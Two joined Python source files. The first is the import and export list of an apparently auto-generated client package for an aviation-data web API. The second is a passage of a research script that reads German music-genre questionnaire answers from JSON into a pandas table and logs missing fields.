from .adi_ems_web_api_v2_dto_weather_taf_temperature_py3 import AdiEmsWebApiV2DtoWeatherTafTemperature
from .adi_ems_web_api_v2_dto_weather_taf_prediction_py3 import AdiEmsWebApiV2DtoWeatherTafPrediction
from .adi_ems_web_api_v2_dto_weather_taf_taf_report_py3 import AdiEmsWebApiV2DtoWeatherTafTafReport
from .adi_ems_web_api_v2_dto_weather_metar_metar_parse_options_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions
from .adi_ems_web_api_v2_dto_weather_metar_runway_visual_range_py3 import AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange
from .adi_ems_web_api_v2_dto_weather_weather_phenomenon_py3 import AdiEmsWebApiV2DtoWeatherWeatherPhenomenon
from .adi_ems_web_api_v2_dto_weather_metar_runway_condition_py3 import AdiEmsWebApiV2DtoWeatherMetarRunwayCondition
from .adi_ems_web_api_v2_dto_weather_metar_metar_report_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarReport
from .adi_ems_web_api_v2_dto_weather_taf_taf_query_py3 import AdiEmsWebApiV2DtoWeatherTafTafQuery
from .adi_ems_web_api_v2_dto_weather_metar_metar_query_py3 import AdiEmsWebApiV2DtoWeatherMetarMetarQuery
from .adi_ems_web_api_v2_dto_weather_weather_report_py3 import AdiEmsWebApiV2DtoWeatherWeatherReport
except (SyntaxError, ImportError):
from .adi_ems_web_api_v2_model_analytic_analytic_id import AdiEmsWebApiV2ModelAnalyticAnalyticId
from .adi_ems_web_api_v2_dto_analytic_info import AdiEmsWebApiV2DtoAnalyticInfo
from .adi_ems_web_api_model_error import AdiEmsWebApiModelError
from .adi_ems_web_api_v2_dto_analytic_group import AdiEmsWebApiV2DtoAnalyticGroup
from .adi_ems_web_api_v2_dto_analytic_group_contents import AdiEmsWebApiV2DtoAnalyticGroupContents
from .adi_ems_web_api_v2_model_analytic_analytic_select import AdiEmsWebApiV2ModelAnalyticAnalyticSelect
from .adi_ems_web_api_v2_model_analytic_offset_type import AdiEmsWebApiV2ModelAnalyticOffsetType
from .adi_ems_web_api_v2_model_analytic_query import AdiEmsWebApiV2ModelAnalyticQuery
from .adi_ems_web_api_v2_model_analytic_analytic_result import AdiEmsWebApiV2ModelAnalyticAnalyticResult
from .adi_ems_web_api_v2_model_analytic_query_result import AdiEmsWebApiV2ModelAnalyticQueryResult
from .adi_ems_web_api_v2_dto_metadata_item import AdiEmsWebApiV2DtoMetadataItem
from .adi_ems_web_api_v2_dto_metadata import AdiEmsWebApiV2DtoMetadata
from .adi_ems_web_api_core_dto_data_range import AdiEmsWebApiCoreDtoDataRange
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_item import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set import AdiEmsWebApiV2DtoAnalyticSetAnalyticSet
from .adi_ems_web_api_v2_dto_analytic_set_analytic_set_group import AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup
from .adi_ems_web_api_v2_dto_asset_fleet import AdiEmsWebApiV2DtoAssetFleet
from .adi_ems_web_api_v2_dto_asset_aircraft import AdiEmsWebApiV2DtoAssetAircraft
from .adi_ems_web_api_v2_dto_asset_flight_phase import AdiEmsWebApiV2DtoAssetFlightPhase
from .adi_ems_web_api_v2_dto_asset_airport import AdiEmsWebApiV2DtoAssetAirport
from .adi_ems_web_api_v2_dto_schema_primary_key_field import AdiEmsWebApiV2DtoSchemaPrimaryKeyField
from .adi_ems_web_api_v2_dto_schema_database import AdiEmsWebApiV2DtoSchemaDatabase
from .adi_ems_web_api_v2_dto_schema_database_group import AdiEmsWebApiV2DtoSchemaDatabaseGroup
from .adi_ems_web_api_v2_dto_schema_field import AdiEmsWebApiV2DtoSchemaField
from .adi_ems_web_api_v2_dto_schema_field_group import AdiEmsWebApiV2DtoSchemaFieldGroup
from .adi_ems_web_api_v2_dto_schema_select_column import AdiEmsWebApiV2DtoSchemaSelectColumn
from .adi_ems_web_api_v2_dto_schema_group_by_column import AdiEmsWebApiV2DtoSchemaGroupByColumn
from .adi_ems_web_api_v2_dto_schema_order_by_column import AdiEmsWebApiV2DtoSchemaOrderByColumn
from .adi_ems_web_api_v2_dto_schema_filter_argument import AdiEmsWebApiV2DtoSchemaFilterArgument
from .adi_ems_web_api_v2_dto_schema_filter import AdiEmsWebApiV2DtoSchemaFilter
from .adi_ems_web_api_v2_dto_schema_query import AdiEmsWebApiV2DtoSchemaQuery
from .adi_ems_web_api_v2_dto_schema_query_result_header import AdiEmsWebApiV2DtoSchemaQueryResultHeader
from .adi_ems_web_api_v2_dto_schema_query_result import AdiEmsWebApiV2DtoSchemaQueryResult
from .adi_ems_web_api_v2_dto_schema_async_query_info import AdiEmsWebApiV2DtoSchemaAsyncQueryInfo
from .adi_ems_web_api_v2_dto_schema_async_query_data import AdiEmsWebApiV2DtoSchemaAsyncQueryData
from .adi_ems_web_api_v2_dto_schema_column import AdiEmsWebApiV2DtoSchemaColumn
from .adi_ems_web_api_v2_dto_schema_create import AdiEmsWebApiV2DtoSchemaCreate
from .adi_ems_web_api_v2_dto_schema_create_result import AdiEmsWebApiV2DtoSchemaCreateResult
from .adi_ems_web_api_v2_dto_schema_update import AdiEmsWebApiV2DtoSchemaUpdate
from .adi_ems_web_api_v2_dto_schema_update_result import AdiEmsWebApiV2DtoSchemaUpdateResult
from .adi_ems_web_api_v2_dto_schema_delete import AdiEmsWebApiV2DtoSchemaDelete
from .adi_ems_web_api_v2_dto_schema_delete_result import AdiEmsWebApiV2DtoSchemaDeleteResult
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_value import AdiEmsWebApiV2DtoEmsProfileProfileResultValue
from .adi_ems_web_api_v2_dto_ems_profile_profile_result_comment import AdiEmsWebApiV2DtoEmsProfileProfileResultComment
from .adi_ems_web_api_v2_dto_ems_profile_profile_results_event_record import AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_ems_profile_profile_results import AdiEmsWebApiV2DtoEmsProfileProfileResults
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile import AdiEmsWebApiV2DtoEmsProfileEmsProfile
from .adi_ems_web_api_v2_dto_ems_profile_glossary_item import AdiEmsWebApiV2DtoEmsProfileGlossaryItem
from .adi_ems_web_api_v2_dto_ems_profile_ems_profile_glossary import AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary
from .adi_ems_web_data_model_ems_system import AdiEmsWebDataModelEmsSystem
from .adi_ems_web_api_v2_dto_navigation_navigation_airport import AdiEmsWebApiV2DtoNavigationNavigationAirport
from .adi_ems_web_api_v2_dto_navigation_navigation_runway import AdiEmsWebApiV2DtoNavigationNavigationRunway
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure import AdiEmsWebApiV2DtoNavigationNavigationProcedure
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment_navaid import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid
from .adi_ems_web_api_v2_dto_navigation_navigation_procedure_segment import AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment
from .adi_ems_web_api_v2_dto_navigation_navigation_waypoint import AdiEmsWebApiV2DtoNavigationNavigationWaypoint
from .adi_ems_web_api_v2_dto_navigation_navigation_navaid import AdiEmsWebApiV2DtoNavigationNavigationNavaid
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_item import AdiEmsWebApiV2DtoParameterSetParameterSetItem
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set import AdiEmsWebApiV2DtoParameterSetParameterSet
from .adi_ems_web_api_v2_dto_parameter_set_parameter_set_group import AdiEmsWebApiV2DtoParameterSetParameterSetGroup
from .adi_ems_web_api_v2_dto_profile_profile_result_value import AdiEmsWebApiV2DtoProfileProfileResultValue
from .adi_ems_web_api_v2_dto_profile_profile_result_comment import AdiEmsWebApiV2DtoProfileProfileResultComment
from .adi_ems_web_api_v2_dto_profile_profile_results_event_record import AdiEmsWebApiV2DtoProfileProfileResultsEventRecord
from .adi_ems_web_api_v2_dto_profile_processing_information import AdiEmsWebApiV2DtoProfileProcessingInformation
from .adi_ems_web_api_v2_dto_profile_profile_results import AdiEmsWebApiV2DtoProfileProfileResults
from .adi_ems_web_api_v2_dto_profile_profile import AdiEmsWebApiV2DtoProfileProfile
from .adi_ems_web_api_v2_dto_profile_profile_group import AdiEmsWebApiV2DtoProfileProfileGroup
from .adi_ems_web_api_v2_dto_profile_glossary_item import AdiEmsWebApiV2DtoProfileGlossaryItem
from .adi_ems_web_api_v2_dto_profile_profile_glossary import AdiEmsWebApiV2DtoProfileProfileGlossary
from .adi_ems_web_api_v2_dto_profile_event import AdiEmsWebApiV2DtoProfileEvent
from .adi_ems_web_api_v2_model_tableau_trusted import AdiEmsWebApiV2ModelTableauTrusted
from .adi_ems_web_api_v2_model_tableau_tableau_server import AdiEmsWebApiV2ModelTableauTableauServer
from .adi_ems_web_shared_tableau_rest_site import AdiEmsWebSharedTableauRestSite
from .adi_ems_web_shared_tableau_rest_project import AdiEmsWebSharedTableauRestProject
from .adi_ems_web_shared_tableau_rest_user import AdiEmsWebSharedTableauRestUser
from .adi_ems_web_shared_tableau_rest_tag import AdiEmsWebSharedTableauRestTag
from .adi_ems_web_shared_tableau_rest_tags import AdiEmsWebSharedTableauRestTags
from .adi_ems_web_shared_tableau_rest_view import AdiEmsWebSharedTableauRestView
from .adi_ems_web_shared_tableau_rest_views import AdiEmsWebSharedTableauRestViews
from .adi_ems_web_shared_tableau_rest_workbook import AdiEmsWebSharedTableauRestWorkbook
from .adi_ems_web_api_v2_dto_trajectory_value import AdiEmsWebApiV2DtoTrajectoryValue
from .adi_ems_web_api_v2_dto_trajectory_value_array import AdiEmsWebApiV2DtoTrajectoryValueArray
from .adi_ems_web_api_v2_dto_trajectory_configuration import AdiEmsWebApiV2DtoTrajectoryConfiguration
from .adi_ems_web_api_v2_dto_upload_upload_request import AdiEmsWebApiV2DtoUploadUploadRequest
from .adi_ems_web_api_v2_dto_upload_upload_parameters import AdiEmsWebApiV2DtoUploadUploadParameters
from .adi_ems_web_api_v2_dto_upload_upload_result import AdiEmsWebApiV2DtoUploadUploadResult
from .adi_ems_web_api_v2_dto_upload_upload_status import AdiEmsWebApiV2DtoUploadUploadStatus
from .adi_ems_web_api_v2_dto_upload_upload_record import AdiEmsWebApiV2DtoUploadUploadRecord
from .adi_ems_web_api_v2_dto_upload_upload_processing_flight_status import AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus
from .adi_ems_web_api_v2_dto_upload_upload_processing_status import AdiEmsWebApiV2DtoUploadUploadProcessingStatus
from .adi_ems_web_api_v2_dto_upload_bucket import AdiEmsWebApiV2DtoUploadBucket
from .adi_ems_web_api_v2_dto_weather_taf_taf_parse_options import AdiEmsWebApiV2DtoWeatherTafTafParseOptions
from .adi_ems_web_api_v2_dto_weather_cloud_condition import AdiEmsWebApiV2DtoWeatherCloudCondition
from .adi_ems_web_api_v2_dto_weather_taf_icing_condition import AdiEmsWebApiV2DtoWeatherTafIcingCondition
from .adi_ems_web_api_v2_dto_weather_taf_turbulence_condition import AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition
from .adi_ems_web_api_v2_dto_weather_taf_temperature import AdiEmsWebApiV2DtoWeatherTafTemperature
from .adi_ems_web_api_v2_dto_weather_taf_prediction import AdiEmsWebApiV2DtoWeatherTafPrediction
from .adi_ems_web_api_v2_dto_weather_taf_taf_report import AdiEmsWebApiV2DtoWeatherTafTafReport
from .adi_ems_web_api_v2_dto_weather_metar_metar_parse_options import AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions
from .adi_ems_web_api_v2_dto_weather_metar_runway_visual_range import AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange
from .adi_ems_web_api_v2_dto_weather_weather_phenomenon import AdiEmsWebApiV2DtoWeatherWeatherPhenomenon
from .adi_ems_web_api_v2_dto_weather_metar_runway_condition import AdiEmsWebApiV2DtoWeatherMetarRunwayCondition
from .adi_ems_web_api_v2_dto_weather_metar_metar_report import AdiEmsWebApiV2DtoWeatherMetarMetarReport
from .adi_ems_web_api_v2_dto_weather_taf_taf_query import AdiEmsWebApiV2DtoWeatherTafTafQuery
from .adi_ems_web_api_v2_dto_weather_metar_metar_query import AdiEmsWebApiV2DtoWeatherMetarMetarQuery
from .adi_ems_web_api_v2_dto_weather_weather_report import AdiEmsWebApiV2DtoWeatherWeatherReport
__all__ = [
'AdiEmsWebApiV2ModelAnalyticAnalyticId',
'AdiEmsWebApiV2DtoAnalyticInfo',
'AdiEmsWebApiModelError',
'AdiEmsWebApiV2DtoAnalyticGroup',
'AdiEmsWebApiV2DtoAnalyticGroupContents',
'AdiEmsWebApiV2ModelAnalyticAnalyticSelect',
'AdiEmsWebApiV2ModelAnalyticOffsetType',
'AdiEmsWebApiV2ModelAnalyticQuery',
'AdiEmsWebApiV2ModelAnalyticAnalyticResult',
'AdiEmsWebApiV2ModelAnalyticQueryResult',
'AdiEmsWebApiV2DtoMetadataItem',
'AdiEmsWebApiV2DtoMetadata',
'AdiEmsWebApiCoreDtoDataRange',
'AdiEmsWebApiV2DtoAnalyticSetAnalyticSetItem',
'AdiEmsWebApiV2DtoAnalyticSetAnalyticSet',
'AdiEmsWebApiV2DtoAnalyticSetAnalyticSetGroup',
'AdiEmsWebApiV2DtoAssetFleet',
'AdiEmsWebApiV2DtoAssetAircraft',
'AdiEmsWebApiV2DtoAssetFlightPhase',
'AdiEmsWebApiV2DtoAssetAirport',
'AdiEmsWebApiV2DtoSchemaPrimaryKeyField',
'AdiEmsWebApiV2DtoSchemaDatabase',
'AdiEmsWebApiV2DtoSchemaDatabaseGroup',
'AdiEmsWebApiV2DtoSchemaField',
'AdiEmsWebApiV2DtoSchemaFieldGroup',
'AdiEmsWebApiV2DtoSchemaSelectColumn',
'AdiEmsWebApiV2DtoSchemaGroupByColumn',
'AdiEmsWebApiV2DtoSchemaOrderByColumn',
'AdiEmsWebApiV2DtoSchemaFilterArgument',
'AdiEmsWebApiV2DtoSchemaFilter',
'AdiEmsWebApiV2DtoSchemaQuery',
'AdiEmsWebApiV2DtoSchemaQueryResultHeader',
'AdiEmsWebApiV2DtoSchemaQueryResult',
'AdiEmsWebApiV2DtoSchemaAsyncQueryInfo',
'AdiEmsWebApiV2DtoSchemaAsyncQueryData',
'AdiEmsWebApiV2DtoSchemaColumn',
'AdiEmsWebApiV2DtoSchemaCreate',
'AdiEmsWebApiV2DtoSchemaCreateResult',
'AdiEmsWebApiV2DtoSchemaUpdate',
'AdiEmsWebApiV2DtoSchemaUpdateResult',
'AdiEmsWebApiV2DtoSchemaDelete',
'AdiEmsWebApiV2DtoSchemaDeleteResult',
'AdiEmsWebApiV2DtoEmsProfileProfileResultValue',
'AdiEmsWebApiV2DtoEmsProfileProfileResultComment',
'AdiEmsWebApiV2DtoEmsProfileProfileResultsEventRecord',
'AdiEmsWebApiV2DtoEmsProfileProfileResults',
'AdiEmsWebApiV2DtoEmsProfileEmsProfile',
'AdiEmsWebApiV2DtoEmsProfileGlossaryItem',
'AdiEmsWebApiV2DtoEmsProfileEmsProfileGlossary',
'AdiEmsWebDataModelEmsSystem',
'AdiEmsWebApiV2DtoNavigationNavigationAirport',
'AdiEmsWebApiV2DtoNavigationNavigationRunway',
'AdiEmsWebApiV2DtoNavigationNavigationProcedure',
'AdiEmsWebApiV2DtoNavigationNavigationProcedureSegmentNavaid',
'AdiEmsWebApiV2DtoNavigationNavigationProcedureSegment',
'AdiEmsWebApiV2DtoNavigationNavigationWaypoint',
'AdiEmsWebApiV2DtoNavigationNavigationNavaid',
'AdiEmsWebApiV2DtoParameterSetParameterSetItem',
'AdiEmsWebApiV2DtoParameterSetParameterSet',
'AdiEmsWebApiV2DtoParameterSetParameterSetGroup',
'AdiEmsWebApiV2DtoProfileProfileResultValue',
'AdiEmsWebApiV2DtoProfileProfileResultComment',
'AdiEmsWebApiV2DtoProfileProfileResultsEventRecord',
'AdiEmsWebApiV2DtoProfileProcessingInformation',
'AdiEmsWebApiV2DtoProfileProfileResults',
'AdiEmsWebApiV2DtoProfileProfile',
'AdiEmsWebApiV2DtoProfileProfileGroup',
'AdiEmsWebApiV2DtoProfileGlossaryItem',
'AdiEmsWebApiV2DtoProfileProfileGlossary',
'AdiEmsWebApiV2DtoProfileEvent',
'AdiEmsWebApiV2ModelTableauTrusted',
'AdiEmsWebApiV2ModelTableauTableauServer',
'AdiEmsWebSharedTableauRestSite',
'AdiEmsWebSharedTableauRestProject',
'AdiEmsWebSharedTableauRestUser',
'AdiEmsWebSharedTableauRestTag',
'AdiEmsWebSharedTableauRestTags',
'AdiEmsWebSharedTableauRestView',
'AdiEmsWebSharedTableauRestViews',
'AdiEmsWebSharedTableauRestWorkbook',
'AdiEmsWebApiV2DtoTrajectoryValue',
'AdiEmsWebApiV2DtoTrajectoryValueArray',
'AdiEmsWebApiV2DtoTrajectoryConfiguration',
'AdiEmsWebApiV2DtoUploadUploadRequest',
'AdiEmsWebApiV2DtoUploadUploadParameters',
'AdiEmsWebApiV2DtoUploadUploadResult',
'AdiEmsWebApiV2DtoUploadUploadStatus',
'AdiEmsWebApiV2DtoUploadUploadRecord',
'AdiEmsWebApiV2DtoUploadUploadProcessingFlightStatus',
'AdiEmsWebApiV2DtoUploadUploadProcessingStatus',
'AdiEmsWebApiV2DtoUploadBucket',
'AdiEmsWebApiV2DtoWeatherTafTafParseOptions',
'AdiEmsWebApiV2DtoWeatherCloudCondition',
'AdiEmsWebApiV2DtoWeatherTafIcingCondition',
'AdiEmsWebApiV2DtoWeatherTafTurbulenceCondition',
'AdiEmsWebApiV2DtoWeatherTafTemperature',
'AdiEmsWebApiV2DtoWeatherTafPrediction',
'AdiEmsWebApiV2DtoWeatherTafTafReport',
'AdiEmsWebApiV2DtoWeatherMetarMetarParseOptions',
'AdiEmsWebApiV2DtoWeatherMetarRunwayVisualRange',
'AdiEmsWebApiV2DtoWeatherWeatherPhenomenon',
'AdiEmsWebApiV2DtoWeatherMetarRunwayCondition',
'AdiEmsWebApiV2DtoWeatherMetarMetarReport',
'AdiEmsWebApiV2DtoWeatherTafTafQuery',
'AdiEmsWebApiV2DtoWeatherMetarMetarQuery',
'AdiEmsWebApiV2DtoWeatherWeatherReport',
]
|
<filename>validation/analysis_questionnaire.py
# analysis_questionnaire.py
# function to read out information, create and save data frames to .csv
# files from results .json files from the music
# genre stimuli questionnaire
def analysis_questionnaire(json_file):
'''inputs should be a participant specific questionnaire file (in .json)
e.g. analysis_questionnaire(test_participant.json)'''
# import important modules
import os
import json
import pandas as pd
# open and load .json file, creating a dict
q_json=json.load(open(json_file))
# assign id
id=str(json_file.split('ergebnisstring_', 1)[1].split('.json',1)[0])
# open an error log file to store all missing values, etc.
f = open("error_log" + id + ".txt", "w")
# create pandas data frame to store converted information
q_data = pd.DataFrame(columns=['age', 'sex', 'handedness', 'education', 'job', 'hearing', 'hearing_dis',
'neuro_psych', 'music_pref_all', 'music_pref', 'band_pref', 'dur_music_day', \
'purpose_music', 'occasion_music', 'active_music_cur', 'active_music_cur_dur', \
'active_music_past', 'active_music_past_dur', 'importance_music', 'chills_often', 'chills_int', \
'punk_sortable', 'punk_sortable_sure', 'punk_know', \
'alternative_sortable', 'alternative_sortable_sure', 'alternative_know', \
'heavymetal_sortable', 'heavymetal_sortable_sure', 'heavymetal_know', \
'psychedelic_sortable', 'psychedelic_sortable_sure', 'psychedelic_know', \
'rocknroll_sortable', 'rocknroll_sortable_sure', 'rocknroll_know', 'rock_all', \
'funk_sortable', 'funk_sortable_sure', 'funk_know', \
'hiphop_sortable', 'hiphop_sortable_sure', 'hiphop_know', \
'reggae_sortable', 'reggae_sortable_sure', 'reggae_know', \
'rnb_sortable', 'rnb_sortable_sure', 'rnb_know', \
'soul_sortable', 'soul_sortable_sure', 'soul_know', 'african_american_all', \
'baroque_sortable', 'baroque_sortable_sure', 'baroque_know', \
'viennese_classic_sortable', 'viennese_classic_sortable_sure', 'viennese_classic_know', \
'modern_classic_sortable', 'modern_classic_sortable_sure', 'modern_classic_know', \
'renaissance_sortable', 'renaissance_sortable_sure', 'renaissance_know', \
'romantic_sortable', 'romantic_sortable_sure', 'romantic_know', 'classic_all', \
'deephouse_sortable', 'deephouse_sortable_sure', 'deephouse_know', \
'drumnbass_sortable', 'drumnbass_sortable_sure', 'drumnbass_know', \
'dubstep_sortable', 'dubstep_sortable_sure', 'dubstep_know', \
'techno_sortable', 'techno_sortable_sure', 'techno_know', \
'trance_sortable', 'trance_sortable_sure', 'trance_know', 'electro_all'], index=[list(range(0,10))])
## read out demographic information
# id has to be added manually to the result file when data is copied from online results
if 'id' in q_json:
q_data['id'][0] = int(q_json['id'])
if 'Alter' in q_json:
q_data['age'][0] = str(q_json['Alter'])
else:
f.write('missing_value_age\n')
if 'Geschlecht' in q_json:
q_data['sex'][0] = str(q_json['Geschlecht'])
else:
f.write('missing_value_sex\n')
if 'Haendigkeit' in q_json:
q_data['handedness'][0] = str(q_json['Haendigkeit'])
else:
f.write('missing_value_handedness\n')
if 'Hoechster Bildungsabschluss' in q_json:
q_data['education'][0] = str(q_json['Hoechster Bildungsabschluss'])
else:
f.write('education\n')
if 'Beruf (wenn Student: Studienfach)' in q_json:
q_data['job'][0] = str(q_json['Beruf (wenn Student: Studienfach)'])
else:
f.write('missing_value_job\n')
if 'Wie wuerden Sie Ihre Hoerfaehigkeit einschaetzen?' in q_json:
q_data['hearing'][0] = str(q_json['Wie wuerden Sie Ihre Hoerfaehigkeit einschaetzen?'])
else:
f.write('missing_value_hearing\n')
if 'Hatten Sie schon mal oder haben Sie...' in q_json:
q_data['hearing_dis'][0] = str(q_json['Hatten Sie schon mal oder haben Sie...'])
else:
f.write('missing_value_hearing_dis\n')
if 'Hatten oder haben Sie eine neurologische oder psychiatrische Erkrankung?' in q_json:
q_data['neuro_psych'][0] = str(q_json['Hatten oder haben Sie eine neurologische oder psychiatrische Erkrankung?'])
else:
f.write('missing_value_neuro_psych\n')
if 'Bitte geben Sie Ihre generelle Praeferenz fuer jedes der folgenden Musikgenres anhand der bereitgestellten Skala an.' in q_json:
q_data_music_pref_all = q_json['Bitte geben Sie Ihre generelle Praeferenz fuer jedes der folgenden Musikgenres anhand der bereitgestellten Skala an.']
if len(q_data_music_pref_all)==23:
for i in range(1,len(q_data_music_pref_all)+1):
q_data['music_pref_all'][i-1]=int(q_data_music_pref_all[str(i)])
else:
f.write('music pref all not complete\n')
else:
f.write('music pref all missing\n')
if 'Welche von den angegebenen Musikstilen bevorzugen Sie?' in q_json:
q_data_music_pref = q_json['Welche von den angegebenen Musikstilen bevorzugen Sie?']
if len(q_data_music_pref)==11:
for i in range(1,len(q_data_music_pref)):
q_data['music_pref'][i-1]=int(q_data_music_pref[str(i)])
else:
f.write('music_pref_not_complete\n')
else:
f.write('music_pref_missing\n')
if 'Welches ist Ihre Lieblingsband/Musikgruppe und welchem Musikstil ist diese zuzuordnen (max. 3)?' in q_json:
q_data['band_pref'][0] = str(q_json['Welches ist Ihre Lieblingsband/Musikgruppe und welchem Musikstil ist diese zuzuordnen (max. 3)?'])
else:
f.write('missing_value_band_pref\n')
if 'Wie lange hoeren Sie an einem typischen Tag Musik?' in q_json:
q_data['dur_music_day'][0] = str(q_json['Wie lange hoeren Sie an einem typischen Tag Musik?'])
else:
f.write('missing_value_dur_music_day\n')
if 'Zu welchem Zweck hoeren Sie Musik?' in q_json:
q_data_purpose_music = q_json['Zu welchem Zweck hoeren Sie Musik?']
if len(q_data_purpose_music)==10:
for i in range(1,len(q_data_purpose_music)):
q_data['purpose_music'][i-1]=int(q_data_purpose_music[str(i)])
else:
f.write('purpose_music_not_complete\n')
else:
f.write('purpose_music_missing\n')
if 'Zu welchen Anlaessen bzw. in welchen Situationen hoeren Sie Musik?' in q_json:
q_data_occasion_music = q_json['Zu welchen Anlaessen bzw. in welchen Situationen hoeren Sie Musik?']
if len(q_data_occasion_music)==8:
for i in range(1,len(q_data_occasion_music)):
q_data['occasion_music'][i-1]=int(q_data_occasion_music[str(i)])
else:
f.write('occasion_music_not_complete\n')
else:
f.write('occasion_purpose_music_missing\n')
if 'Machen Sie im Moment aktiv Musik?' in q_json:
q_data['active_music_cur'][0] = str(q_json['Machen Sie im Moment aktiv Musik?'])
else:
f.write('missing_value_neuro_active_music_cur\n')
if 'Wenn Sie ein Instrument spielen, welches ist es und wie lange spielen Sie schon? Wenn Sie in einem Chor oder einer Band singen, wie lange schon?' in q_json:
q_data['active_music_cur_dur'][0] = str(q_json['Wenn Sie ein Instrument spielen, welches ist es und wie lange spielen Sie schon? Wenn Sie in einem Chor oder einer Band singen, wie lange schon?'])
else:
f.write('missing_value_active_music_cur_dur\n')
if 'Haben Sie frueher aktiv Musik gemacht?' in q_json:
q_data['active_music_past'][0] = str(q_json['Haben Sie frueher aktiv Musik gemacht?'])
else:
f.write('missing_value_active_music_past\n')
if 'Wenn Sie ein Instrument spielten, welches war es und wie lange spielten Sie es? Wenn Sie in einem Chor oder einer Band sangen, wie lange?' in q_json:
q_data['active_music_past_dur'][0] = str(q_json['Wenn Sie ein Instrument spielten, welches war es und wie lange spielten Sie es? Wenn Sie in einem Chor oder einer Band sangen, wie lange?'])
else:
f.write('missing_value_active_music_dur\n')
if 'Wie wichtig ist Musik in Ihrem Leben?' in q_json:
q_data['importance_music'][0] = int(q_json['Wie wichtig ist Musik in Ihrem Leben?'])
else:
f.write('missing_value_importance_music\n')
if 'Mit der naechsten Frage moechten wir gerne herausfinden, wie oft und wie stark Sie sogenannte Chills erleben. Chills sind koerperliche Reaktionen, ein Schaudern oder Froesteln, das sich vom Kopf her ueber den Ruecken und/oder andere Teile des Koerpers ausbreitet. Es gibt diese Reaktionen in Zusammenhang mit vielen Erlebnissen wie z.B. bei Angst, Erschrecken oder beim Betrachten von Kunst. Wir moechten Sie aber bitten, dass Sie sich auf Chills beschraenken, welche Sie ausschliesslich beim Musikhoeren erleben.' in q_json:
q_data_chills_often = q_json['Mit der naechsten Frage moechten wir gerne herausfinden, wie oft und wie stark Sie sogenannte Chills erleben. Chills sind koerperliche Reaktionen, ein Schaudern oder Froesteln, das sich vom Kopf her ueber den Ruecken und/oder andere Teile des Koerpers ausbreitet. Es gibt diese Reaktionen in Zusammenhang mit vielen Erlebnissen wie z.B. bei Angst, Erschrecken oder beim Betrachten von Kunst. Wir moechten Sie aber bitten, dass Sie sich auf Chills beschraenken, welche Sie ausschliesslich beim Musikhoeren erleben.']
if len(q_data_chills_often)==1:
q_data['chills_often'][0]=q_data_chills_often['1']
else:
f.write('missing_value_chills_often\n')
else:
f.write('missing_value_chills_often\n')
if 'Falls Sie Chills erleben, geben Sie bitte an, wie intensiv Ihre erlebten Chills sind' in q_json:
q_data['chills_int'][0] = int(q_json['Falls Sie Chills erleben, geben Sie bitte an, wie intensiv Ihre erlebten Chills sind'])
else:
f.write('missing_value_chills_int\n')
### read out sortables
## read out sortables rock
# read out sortables rock - punk
q_data_punk_sortable = q_json['punk_sortable']
if len(q_data_punk_sortable)==10:
for i in range(0, len(q_json['punk_sortable'])):
q_data['punk_sortable'][i] = str(q_json['punk_sortable'][i])
else:
f.write('missing_value_punk_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Punk)?' in q_json:
q_data['punk_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Punk)?'])
else:
f.write('missing_value_punk_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Punk aus?' in q_json:
q_data['punk_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Punk aus?'])
else:
f.write('missing_value_punk_know\n')
# read out sortables rock - alternative
q_data_alternative_sortable = q_json['alternative_sortable']
if len(q_data_alternative_sortable)==10:
for i in range(0, len(q_json['alternative_sortable'])):
q_data['alternative_sortable'][i] = str(q_json['alternative_sortable'][i])
else:
f.write('missing_value_alternative_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Alternative)?' in q_json:
q_data['alternative_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Alternative)?'])
else:
f.write('missing_value_alternative_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Alternative aus?' in q_json:
q_data['alternative_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Alternative aus?'])
else:
f.write('missing_value_alternativ_know\n')
# read out sortables rock - heavymetal
q_data_heavymetal_sortable = q_json['heavymetal_sortable']
if len(q_data_heavymetal_sortable)==10:
for i in range(0, len(q_json['heavymetal_sortable'])):
q_data['heavymetal_sortable'][i] = str(q_json['heavymetal_sortable'][i])
else:
f.write('missing_value_heavymetal_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Heavy Metal)?' in q_json:
q_data['heavymetal_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Heavy Metal)?'])
else:
f.write('missing_value_heavymetal_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Heavy Metal aus?' in q_json:
q_data['heavymetal_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Heavy Metal aus?'])
else:
f.write('missing_value_heavymetal_know\n')
# read out sortables rock - psychedelic
q_data_psychedelic_sortable = q_json['psychedelic_sortable']
if len(q_data_psychedelic_sortable)==10:
for i in range(0, len(q_json['psychedelic_sortable'])):
q_data['psychedelic_sortable'][i] = str(q_json['psychedelic_sortable'][i])
else:
f.write('missing_value_psychedelic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Psychedelic)?' in q_json:
q_data['psychedelic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Psychedelic)?'])
else:
